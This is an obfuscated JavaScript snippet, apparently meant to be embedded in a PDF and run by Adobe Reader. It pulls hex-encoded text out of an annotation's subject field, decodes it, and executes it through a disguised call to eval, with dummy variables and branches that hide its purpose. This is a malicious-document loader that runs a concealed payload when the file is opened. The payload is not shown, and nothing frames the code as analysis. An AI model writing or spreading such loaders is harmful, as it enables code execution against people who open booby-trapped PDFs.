var sum = ''
var duct = 300
var os = ''
var pr = null
var num = 1
var func = 'd'
app.doc.syncAnnotScan()
if (app.plugIns.length < 1) {
  func += '4'
  num = 0
}
if (!(app.plugIns.length < 0)) {
  pr = app.doc.getAnnots(xnm)
  sum = pr[num].subject
}
if (app.plugIns.length > 2) {
  var buf = sum.split(/-/)
  var ap = this
  var src = String.fromCharCode
  var bf = ap.unescape
  for (var n = 0; n < buf.length - 1; n++) {
    os += bf('%' + buf[n + 1])
  }
  func = ''
  if (app.plugIns.length > 0) {
    if (!(app.plugIns.length > 0)) {
      func += 'abd'
      num = 123
    }
    num = 541
    ap['ev' + func + src(97) + 'l'](os)
    num = 5475
  }
}
